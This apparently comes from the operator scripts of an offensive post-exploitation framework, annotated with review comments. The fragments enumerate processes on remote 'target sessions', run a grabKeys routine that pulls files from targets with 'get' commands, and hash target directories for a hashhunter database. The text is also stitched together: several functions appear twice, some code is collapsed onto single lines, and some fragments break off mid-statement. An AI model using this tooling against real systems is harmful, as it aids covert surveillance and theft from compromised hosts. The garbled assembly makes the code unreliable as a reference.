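def pulist(ip, dszquiet=False):
    """Enumerate processes on *ip* via the 'performance' command (Process object).

    Runs ``performance -data Process`` through ``ops.cmd`` and prints one row per
    instance with PID, PPID, elapsed time, process name and the code/comment that
    ``check_process`` (defined elsewhere; its classification is not visible here)
    assigns to it.  The error texts below indicate the data comes from a registry
    performance hive on the target.  The 'Idle' and 'System' pseudo-processes are
    labelled locally; the '_Total' aggregate row with zero runtime is dropped.

    Args:
        ip: target address; '127.0.0.1' means the current session (no -target).
        dszquiet: when true, turn quiet on and echo off for the command.

    Returns:
        The command result on success, None when the command failed or returned
        no performance data.  Failures are reported through ops.error or the
        LOGFILE logger.
    """
    # NOTE(review): dsz.control.Method() looks like a scoped handle whose deletion
    # restores the quiet/echo settings changed below — confirm.  Every exit path
    # deletes it explicitly to preserve that.
    flags = dsz.control.Method()
    if dszquiet:
        dsz.control.quiet.On()
        dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('performance',
                                dszuser=ops.cmd.CURRENT_USER,
                                data='Process',
                                bare=True,
                                target=(ip if ip != '127.0.0.1' else None))
    ops.info("Running '%s'..." % cmd)
    result = cmd.execute()
    if not cmd.success:
        status = result.commandmetadata.status
        if status == 268435456:
            ops.error('Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.' % result.cmdid)
        elif status is None:
            log = DSZPyLogger().getLogger(LOGFILE)
            log.error('Command did not execute, possibly the result of a malformed command line.')
            ops.info('A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
        else:
            ops.error('Failed to query performance hive. Check your logs for command ID %d for more information.' % result.cmdid)
        # Fix: the "did not execute" branch used to fall through into result
        # processing without any performance data; every failure now returns None.
        del flags
        return None
    if not result.performance.object:
        ops.error('Query succeeded but returned no data. Check your logs for command ID %d and hope for enlightenment.' % result.cmdid)
        # Fix: previously fell through to result.performance.object[0] and raised.
        del flags
        return None
    # Matches names that already end in a dot plus three characters; anything
    # else gets '.exe' appended before it is handed to check_process.
    has_extension = re.compile('.+\\....$')
    table = []
    echo = []
    for instance in result.performance.object[0].instance:
        if has_extension.match(instance.name) is None:
            proc = instance.name + '.exe'
        else:
            proc = instance.name
        # The code treats counter '784' as the PID, '1410' as the PPID and '684'
        # as a start time in the same 100ns units as perfTime100nSec (difference
        # // 10 gives microseconds).  Fix: start each instance unset so a missing
        # counter yields None rather than the previous instance's value (or an
        # UnboundLocalError on the first instance).
        pid = ppid = runtime = None
        for c in instance.counter:
            if c.name == '784':
                pid = int(c.value)
            elif c.name == '1410':
                ppid = int(c.value)
            elif c.name == '684':
                runtime = datetime.timedelta(microseconds=((result.performance.perfTime100nSec - int(c.value)) // 10))
        if (pid == 0 and ppid == 0 and instance.name == 'Idle') or (pid in (4, 8) and instance.name == 'System'):
            code = dsz.DEFAULT
            comment = 'System Idle Counter' if instance.name == 'Idle' else 'System Kernel'
        elif pid == 0 and ppid == 0 and instance.name == '_Total' and runtime == datetime.timedelta(microseconds=0):
            # Aggregate row, not a process.
            continue
        else:
            code, comment = check_process(proc)
        table.append({'Process': instance.name,
                      'PID': pid,
                      'PPID': ppid,
                      'Comment': comment,
                      'Elapsed Time': runtime})
        echo.append(code)
    pprint(table, dictorder=['PID', 'PPID', 'Elapsed Time', 'Process', 'Comment'], echocodes=echo)
    del flags
    return result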
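def main():
    """Record an operator-submitted problem report in the per-tool log.

    Usage: ``<script> TOOLNAME PROBLEM TEXT...``.  The report is refused when
    ops.TARGET_ADDR is the placeholder 'z0.0.0.1' (not a target session).  The
    reporter's id comes from the OPS_USERID environment value; it is prompted for
    and stored once when unset.  Exits with -1 on misuse.
    """
    if ops.TARGET_ADDR == 'z0.0.0.1':
        ops.warn('Problems can only be reported from target sessions. If you have no more target sessions, please complain about the problem through other means')
        sys.exit(-1)
    # Fix: sys.argv[1] raised IndexError when no tool name was given.
    if len(sys.argv) < 2:
        ops.warn('No tool name given. Usage: TOOLNAME PROBLEM TEXT...')
        sys.exit(-1)
    toolName = sys.argv[1]
    if not dsz.env.Check('OPS_USERID'):
        idnum = dsz.ui.GetInt('Please enter your ID')
        dsz.env.Set('OPS_USERID', str(idnum), 0, '')
    idnum = dsz.env.Get('OPS_USERID')
    problemText = ' '.join(sys.argv[2:])
    # NOTE(review): the logger name is taken verbatim from argv; if getLogger
    # derives a log file path from it, an unsanitised name chooses the
    # destination — confirm in DSZPyLogger.
    toolLog = DSZPyLogger().getLogger(toolName)
    # 21 is a non-standard log level; its meaning is defined by DSZPyLogger.
    toolLog.log(21, idnum + ':' + problemText)
    ops.info('Your problem has been logged and will be reported when you are done')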
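def __init__(self, file, name):
    """Load a tasking file: every 'KEY VALUE' line becomes an instance attribute.

    Args:
        file: path of the tasking file; opened read-only and closed on return
            (an open failure propagates, as before).
        name: label stored as ``self.name``.

    Each line is stripped, split once on whitespace and stored as
    ``self.<first word> = <rest>`` (a string).  Any key in the file lands in
    ``self.__dict__`` unchecked, so it overrides ``Priority`` (default 10),
    ``file`` and ``name`` set here; the file is trusted as configuration — its
    trust boundary is not visible in this excerpt.  A blank or single-word line
    raises inside the loop; the failure is logged to 'TaskingLog', the file is
    copied next to the log directory for inspection and the instance is left
    partially populated.
    """
    self.file = file
    self.name = name
    fh = open(file, 'r')
    self.Priority = 10
    # Context manager so the handle is closed on both paths (it never was).
    with fh:
        try:
            for line in fh:
                item = line.strip().split(None, 1)
                self.__dict__[item[0]] = item[1]
        except Exception:
            # Fix: the original rebound the class name to an instance inside this
            # handler ('DSZPyLogger = DSZPyLogger()'), which made the name local
            # to the whole method and raised UnboundLocalError before logging.
            dszlogger = DSZPyLogger()
            taskingLog = dszlogger.getLogger('TaskingLog')
            taskingLog.warning('Tasking.py failed to parse: %s' % file)
            shutil.copy(file, os.path.join(dszlogger.LOG_FILE_DIR, '..'))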
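def main():
    """Record an operator-submitted problem report in the per-tool log.

    Usage: ``<script> TOOLNAME PROBLEM TEXT...``.  The report is refused when
    ops.TARGET_ADDR is the placeholder 'z0.0.0.1' (not a target session).  The
    reporter's id comes from the OPS_USERID environment value; it is prompted for
    and stored once when unset.  Exits with -1 on misuse.
    """
    if ops.TARGET_ADDR == 'z0.0.0.1':
        ops.warn('Problems can only be reported from target sessions. If you have no more target sessions, please complain about the problem through other means')
        sys.exit(-1)
    # Fix: sys.argv[1] raised IndexError when no tool name was given.
    if len(sys.argv) < 2:
        ops.warn('No tool name given. Usage: TOOLNAME PROBLEM TEXT...')
        sys.exit(-1)
    toolName = sys.argv[1]
    if not dsz.env.Check('OPS_USERID'):
        idnum = dsz.ui.GetInt('Please enter your ID')
        dsz.env.Set('OPS_USERID', str(idnum), 0, '')
    idnum = dsz.env.Get('OPS_USERID')
    problemText = ' '.join(sys.argv[2:])
    # NOTE(review): the logger name is taken verbatim from argv; if getLogger
    # derives a log file path from it, an unsanitised name chooses the
    # destination — confirm in DSZPyLogger.
    toolLog = DSZPyLogger().getLogger(toolName)
    # 21 is a non-standard log level; its meaning is defined by DSZPyLogger.
    toolLog.log(21, idnum + ':' + problemText)
    ops.info('Your problem has been logged and will be reported when you are done')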
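def emkg_plist(ip, dszquiet=False):
    """List processes on *ip* with the 'processes -list' command and print them.

    Each process is annotated with the code/comment returned by check_process
    (defined elsewhere; its classification is not visible here).  PID 0 with
    PPID 0 is reported as 'System Idle Process'.  The 'User' column is printed
    only for the local session (ip None or '127.0.0.1').

    Args:
        ip: target address; '127.0.0.1' (or None) means the current session.
        dszquiet: when true, turn quiet on and echo off for the command.

    Returns:
        The command result on success, None when the command failed.  Failures
        are reported through ops.error or the LOGFILE logger.
    """
    # NOTE(review): dsz.control.Method() looks like a scoped handle whose deletion
    # restores the quiet/echo settings — confirm.  Every exit path deletes it.
    flags = dsz.control.Method()
    if dszquiet:
        dsz.control.quiet.On()
        dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('processes',
                                dszuser=ops.cmd.CURRENT_USER,
                                list=True,
                                target=(ip if ip != '127.0.0.1' else None))
    ops.info("Running '%s'..." % cmd)
    result = cmd.execute()
    if not cmd.success:
        status = result.commandmetadata.status
        if status == 268435456:
            ops.error('Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.' % result.cmdid)
        elif status is None:
            log = DSZPyLogger().getLogger(LOGFILE)
            log.error('Command did not execute, possibly the result of a malformed command line.')
            ops.info('A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
        else:
            # Fix: the message said "performance hive" (copied from pulist); this
            # path runs the process-list command.
            ops.error('Failed to list processes. Check your logs for command ID %d for more information.' % result.cmdid)
        # Fix: the "did not execute" branch used to fall through into result
        # processing; every failure now returns None.
        del flags
        return None
    table = []
    echo = []
    for processitem in result.initialprocesslistitem.processitem:
        if processitem.id == 0 and processitem.parentid == 0:
            name = 'System Idle Process'
        else:
            name = processitem.name
        code, comment = check_process(name)
        if processitem.name in ('System', 'System Idle Process'):
            created = ''
        else:
            # NOTE(review): created.type looks like a clock/zone label — confirm.
            created = '%s %s %s' % (processitem.created.date,
                                    processitem.created.time,
                                    processitem.created.type.upper())
        table.append({'Path': processitem.path,
                      'Process': name,
                      'PID': processitem.id,
                      'PPID': processitem.parentid,
                      'Created': created,
                      'Comment': comment,
                      'User': processitem.user})
        echo.append(code)
    if ip is None or ip == '127.0.0.1':
        columns = ['PID', 'PPID', 'Created', 'Path', 'Process', 'User', 'Comment']
    else:
        columns = ['PID', 'PPID', 'Created', 'Path', 'Process', 'Comment']
    pprint(table, dictorder=columns, echocodes=echo)
    del flags
    return result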
def error(s, log=DEFAULT_LOG):
    """Log *s* at ERROR level on the DSZPyLogger logger named *log*."""
    DSZPyLogger().getLogger(log).error(s)
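def pulist(ip, dszquiet=False):
    """Enumerate processes on *ip* via the 'performance' command (Process object).

    Runs ``performance -data Process`` through ``ops.cmd`` and prints one row per
    instance with PID, PPID, elapsed time, process name and the code/comment that
    ``check_process`` (defined elsewhere; its classification is not visible here)
    assigns to it.  The error texts below indicate the data comes from a registry
    performance hive on the target.  The 'Idle' and 'System' pseudo-processes are
    labelled locally; the '_Total' aggregate row with zero runtime is dropped.

    Args:
        ip: target address; '127.0.0.1' means the current session (no -target).
        dszquiet: when true, turn quiet on and echo off for the command.

    Returns:
        The command result on success, None when the command failed or returned
        no performance data.  Failures are reported through ops.error or the
        LOGFILE logger.
    """
    # NOTE(review): dsz.control.Method() looks like a scoped handle whose deletion
    # restores the quiet/echo settings changed below — confirm.  Every exit path
    # deletes it explicitly to preserve that.
    flags = dsz.control.Method()
    if dszquiet:
        dsz.control.quiet.On()
        dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('performance',
                                dszuser=ops.cmd.CURRENT_USER,
                                data='Process',
                                bare=True,
                                target=(ip if ip != '127.0.0.1' else None))
    ops.info("Running '%s'..." % cmd)
    result = cmd.execute()
    if not cmd.success:
        status = result.commandmetadata.status
        if status == 268435456:
            ops.error('Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.' % result.cmdid)
        elif status is None:
            log = DSZPyLogger().getLogger(LOGFILE)
            log.error('Command did not execute, possibly the result of a malformed command line.')
            ops.info('A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
        else:
            ops.error('Failed to query performance hive. Check your logs for command ID %d for more information.' % result.cmdid)
        # Fix: the "did not execute" branch used to fall through into result
        # processing without any performance data; every failure now returns None.
        del flags
        return None
    if not result.performance.object:
        ops.error('Query succeeded but returned no data. Check your logs for command ID %d and hope for enlightenment.' % result.cmdid)
        # Fix: previously fell through to result.performance.object[0] and raised.
        del flags
        return None
    # Matches names that already end in a dot plus three characters; anything
    # else gets '.exe' appended before it is handed to check_process.
    has_extension = re.compile('.+\\....$')
    table = []
    echo = []
    for instance in result.performance.object[0].instance:
        if has_extension.match(instance.name) is None:
            proc = instance.name + '.exe'
        else:
            proc = instance.name
        # The code treats counter '784' as the PID, '1410' as the PPID and '684'
        # as a start time in the same 100ns units as perfTime100nSec (difference
        # // 10 gives microseconds).  Fix: start each instance unset so a missing
        # counter yields None rather than the previous instance's value (or an
        # UnboundLocalError on the first instance).
        pid = ppid = runtime = None
        for c in instance.counter:
            if c.name == '784':
                pid = int(c.value)
            elif c.name == '1410':
                ppid = int(c.value)
            elif c.name == '684':
                runtime = datetime.timedelta(microseconds=((result.performance.perfTime100nSec - int(c.value)) // 10))
        if (pid == 0 and ppid == 0 and instance.name == 'Idle') or (pid in (4, 8) and instance.name == 'System'):
            code = dsz.DEFAULT
            comment = 'System Idle Counter' if instance.name == 'Idle' else 'System Kernel'
        elif pid == 0 and ppid == 0 and instance.name == '_Total' and runtime == datetime.timedelta(microseconds=0):
            # Aggregate row, not a process.
            continue
        else:
            code, comment = check_process(proc)
        table.append({'Process': instance.name,
                      'PID': pid,
                      'PPID': ppid,
                      'Comment': comment,
                      'Elapsed Time': runtime})
        echo.append(code)
    pprint(table, dictorder=['PID', 'PPID', 'Elapsed Time', 'Process', 'Comment'], echocodes=echo)
    del flags
    return result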
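for fullpath in getlist:
    # Trailing fragment of a definition that begins before this excerpt
    # (getlist is bound there); kept as-is apart from formatting.
    # NOTE(review): the path is interpolated into a quoted command string, so a
    # path containing '"' would break the command line — confirm how dsz.cmd.Run
    # tokenises it.
    command = 'get "%s"' % fullpath
    dsz.cmd.Run(command, dsz.RUN_FLAG_RECORD)


def main():
    """Run grabKeys for every mask unless it ran within RUN_PERIOD, then mark it done.

    Reads last_date from the GRABKEYS marker, asks the operator to confirm, and
    calls getKeys(mask, last_run) for each mask from getMaskList().  A failing
    mask is reported and the loop continues; the marker is set afterwards even
    when some masks failed ("completed or at least attempted").
    """
    last_run = ops.marker.get('GRABKEYS')['last_date']
    if datetime.datetime.now() - last_run <= RUN_PERIOD:
        ops.info('grabKeys was run in the last %s, not running again' % str(RUN_PERIOD))
        return
    answer = dsz.ui.Prompt('Do you want to run grabKeys? Last run was %s' % last_run)
    if not answer:
        return
    for mask in getMaskList():
        try:
            getKeys(mask, last_run)
        except Exception:
            # Fix: was a bare except, which also swallowed KeyboardInterrupt
            # and SystemExit; per-mask failures are still best-effort.
            ops.error('Failed to get keys with mask "%s"' % mask)
            traceback.print_exc()
    ops.info('All masks completed or at least attempted, marking grabKeys done')
    ops.marker.set('GRABKEYS')


if __name__ == '__main__':
    try:
        main()
    except Exception:
        # Fix: bare except narrowed so an interrupt is not filed as a problem.
        ops.error('Grabkeys had a major failure')
        traceback.print_exc()
        # Level 10 equals logging.DEBUG numerically; whether DSZPyLogger treats
        # it that way is not visible here.
        DSZPyLogger().getLogger('grabkeys').log(10, str(sys.exc_info()))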
if args: parser.print_help() parser.error('Not all arguments consumed by the beast.') if (not (options.wmi ^ options.reg)): parser.print_help() parser.error('One of --wmi or --reg must be specified so I know what to do.') if (options.target is None): if (not dsz.ui.Prompt('No target provided. Did you really mean to run this against localhost?', False)): sys.exit((-1)) if ((options.target is not None) and options.target.startswith('\\\\')): options.target = options.target[2:] ops.info(("A \\\\ is not required. I assume you mean '%s' as your target IP." % options.target)) if ((options.target is not None) and (not util.ip.validate(options.target))): ops.error(("Your target '%s' does not appear to be a proper IP address. Try again." % options.target)) sys.exit((-1)) if options.wmi: func = emkg_plist elif options.reg: func = pulist else: raise RuntimeError, "How'd you get here? You get a prize!" try: ret = func(options.target, dszquiet) except Exception as e: dszlogger = DSZPyLogger() log = dszlogger.getLogger(LOGFILE) log.error(traceback.format_exc()) ops.info('Unexpected things happened. A problem report has been automatically generated for this issue.', type=dsz.DEFAULT) ret = False if (not ret): sys.exit((-1))
def warn(s, log=DEFAULT_LOG):
    """Log *s* at WARNING level on the DSZPyLogger logger named *log*."""
    # NOTE(review): calls logger.warn(); on a stdlib Logger that is the
    # deprecated alias of warning() — confirm what getLogger returns before
    # changing it.
    DSZPyLogger().getLogger(log).warn(s)
def debug(s, log=DEFAULT_LOG):
    """Log *s* at DEBUG level when the module flag _debug_enabled is set.

    Returns:
        The value of _debug_enabled, so callers can tell whether anything
        was logged.
    """
    enabled = _debug_enabled
    if enabled:
        DSZPyLogger().getLogger(log).debug(s)
    return enabled
import ops.cmd, ops.db, ops import os.path import dsz from ops.pprint import pprint import sys from util.DSZPyLogger import DSZPyLogger from datetime import timedelta import optparse dzlogger = DSZPyLogger() drvlog = dzlogger.getLogger('DRIVERLIST') def main(argv=None): parser = optparse.OptionParser() parser.add_option('-a', dest='maxage', action='store', type='int', default=3600, help='The maximum age for any particular dir') options = parser.parse_args(argv)[0] maxage = options.maxage voldb = ops.db.get_voldb() conn = voldb.connection with conn: curs = conn.execute('SELECT mask,path FROM hashhunter WHERE cpaddr=?', [ops.TARGET_ADDR]) dir_list = [] for row in curs: dir_list.append([row['mask'], row['path']]) completed = [] for item in dir_list: if (item in completed): continue dircmd = ops.cmd.getDszCommand('dir -hash sha1 -max 0') dircmd.mask = item[0] dircmd.path = item[1]
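def emkg_plist(ip, dszquiet=False):
    """List processes on *ip* with the 'processes -list' command and print them.

    Each process is annotated with the code/comment returned by check_process
    (defined elsewhere; its classification is not visible here).  PID 0 with
    PPID 0 is reported as 'System Idle Process'.  The 'User' column is printed
    only for the local session (ip None or '127.0.0.1').

    Args:
        ip: target address; '127.0.0.1' (or None) means the current session.
        dszquiet: when true, turn quiet on and echo off for the command.

    Returns:
        The command result on success, None when the command failed.  Failures
        are reported through ops.error or the LOGFILE logger.
    """
    # NOTE(review): dsz.control.Method() looks like a scoped handle whose deletion
    # restores the quiet/echo settings — confirm.  Every exit path deletes it.
    flags = dsz.control.Method()
    if dszquiet:
        dsz.control.quiet.On()
        dsz.control.echo.Off()
    cmd = ops.cmd.getDszCommand('processes',
                                dszuser=ops.cmd.CURRENT_USER,
                                list=True,
                                target=(ip if ip != '127.0.0.1' else None))
    ops.info("Running '%s'..." % cmd)
    result = cmd.execute()
    if not cmd.success:
        status = result.commandmetadata.status
        if status == 268435456:
            ops.error('Open of registry failed.\n\tThis could be because access is denied or the network path was not found.\n\tCheck your logs for command ID %d for more information.' % result.cmdid)
        elif status is None:
            log = DSZPyLogger().getLogger(LOGFILE)
            log.error('Command did not execute, possibly the result of a malformed command line.')
            ops.info('A problem report has been automatically generated for this issue.', type=dsz.DEFAULT)
        else:
            # Fix: the message said "performance hive" (copied from pulist); this
            # path runs the process-list command.
            ops.error('Failed to list processes. Check your logs for command ID %d for more information.' % result.cmdid)
        # Fix: the "did not execute" branch used to fall through into result
        # processing; every failure now returns None.
        del flags
        return None
    table = []
    echo = []
    for processitem in result.initialprocesslistitem.processitem:
        if processitem.id == 0 and processitem.parentid == 0:
            name = 'System Idle Process'
        else:
            name = processitem.name
        code, comment = check_process(name)
        if processitem.name in ('System', 'System Idle Process'):
            created = ''
        else:
            # NOTE(review): created.type looks like a clock/zone label — confirm.
            created = '%s %s %s' % (processitem.created.date,
                                    processitem.created.time,
                                    processitem.created.type.upper())
        table.append({'Path': processitem.path,
                      'Process': name,
                      'PID': processitem.id,
                      'PPID': processitem.parentid,
                      'Created': created,
                      'Comment': comment,
                      'User': processitem.user})
        echo.append(code)
    if ip is None or ip == '127.0.0.1':
        columns = ['PID', 'PPID', 'Created', 'Path', 'Process', 'User', 'Comment']
    else:
        columns = ['PID', 'PPID', 'Created', 'Path', 'Process', 'Comment']
    pprint(table, dictorder=columns, echocodes=echo)
    del flags
    return result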
False)): sys.exit((-1)) if ((options.target is not None) and options.target.startswith('\\\\')): options.target = options.target[2:] ops.info(( "A \\\\ is not required. I assume you mean '%s' as your target IP." % options.target)) if ((options.target is not None) and (not util.ip.validate(options.target))): ops.error(( "Your target '%s' does not appear to be a proper IP address. Try again." % options.target)) sys.exit((-1)) if options.wmi: func = emkg_plist elif options.reg: func = pulist else: raise RuntimeError, "How'd you get here? You get a prize!" try: ret = func(options.target, dszquiet) except Exception as e: dszlogger = DSZPyLogger() log = dszlogger.getLogger(LOGFILE) log.error(traceback.format_exc()) ops.info( 'Unexpected things happened. A problem report has been automatically generated for this issue.', type=dsz.DEFAULT) ret = False if (not ret): sys.exit((-1))
import ops.cmd, ops.db, ops import os.path import dsz from ops.pprint import pprint import sys from util.DSZPyLogger import DSZPyLogger from datetime import timedelta import optparse dzlogger = DSZPyLogger() drvlog = dzlogger.getLogger('DRIVERLIST') def main(argv=None): parser = optparse.OptionParser() parser.add_option('-a', dest='maxage', action='store', type='int', default=3600, help='The maximum age for any particular dir') options = parser.parse_args(argv)[0] maxage = options.maxage voldb = ops.db.get_voldb() conn = voldb.connection with conn: curs = conn.execute('SELECT mask,path FROM hashhunter WHERE cpaddr=?', [ops.TARGET_ADDR]) dir_list = [] for row in curs: dir_list.append([row['mask'], row['path']]) completed = []